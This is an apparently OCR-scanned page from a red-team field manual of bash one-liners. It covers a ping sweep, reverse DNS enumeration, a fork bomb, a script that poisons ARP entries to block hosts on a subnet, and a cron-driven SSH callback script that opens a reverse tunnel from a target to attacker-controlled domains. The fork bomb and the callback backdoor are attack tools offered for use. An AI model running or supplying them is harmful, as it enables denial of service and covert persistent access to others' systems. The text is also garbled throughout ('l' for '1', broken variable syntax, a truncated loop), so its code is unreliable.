PING SWEEP

for x in {1 .. 254 .. l};do ping -c 1 l.l.l.$x lgrep "64 b" |cut -d" "-f4 >> ips.txt; done

AUTOMATED DOMAIN NAME RESOLVE BASH SCRIPT

#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1 .. 254 .. l};do
host $range.$ip |grep "name pointer" |cut -d" " -f5
done

FORK BOMB(CREATES PROCESSES UNTIL SYSTEM "CRASHES")

: (){:|:&};:

DNS REVERSE LOOKUP

for ip in {1 .. 254 .. 1}; do dig -x l.l.l.$ip | grep $ip >> dns.txt; done;

BANNING SCRIPT

#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while [ $i -le 253 ]
do
	if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
		echo "BANNED: arp -s 192.168.1.$i"
		arp -s 192.168.1.$i OO:OO:OO:OO:OO:Oa
	else
		echo "IP NOT BANNED: 192.168.1.$i**************"
		echo "*****************************************"
	fi
	i='expr $i +1'
done

SSH CALLBACK

Set up script in crontab to callback ever} X minutes. Highly recommend you set up a generic user on red team computer (with no shell privs). Script will use the private key (located on callback source computer) to connect to a public key (on red team computer). Red teamer connects to target via a local SSH session (in the example below, use #ssh -p4040 localhost)

#!/bin/sh
#Callback script located on callback source computer(target)
killall ssh >/dev/null 2 &1
sleep 5
REMLIS=4040
REMUSR=user
HOSTS="domainl.com domain2.com domain3.com"
for LIVEHOST in SHOSTS;
do
	COUNT-S(ping -c2 $LIVEHOST | grep 'received' | awk -F',' "{ print
$2 }' | awk '{print $1 }')
	if [[ $COUNT -gt 0 ]]; then
		ssh -R $(REMLIS}:localhost:22 -i
"/home/$(REMUSR}/.ssh/id rsa" -N $(LIVEHOST} -1 $(REMUSR}
fi